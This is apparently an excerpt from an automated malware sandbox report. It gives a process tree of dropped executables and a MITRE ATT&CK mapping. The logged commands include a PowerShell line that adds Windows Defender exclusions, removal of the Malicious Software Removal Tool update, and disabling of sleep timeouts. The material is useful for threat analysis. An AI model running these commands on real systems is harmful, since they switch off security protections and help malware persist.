PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2912 -ip 2912
1⤵
PID:4616

C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5744
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5396
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2848
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:6088
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5424
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6044
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3576

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Defense Evasion

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion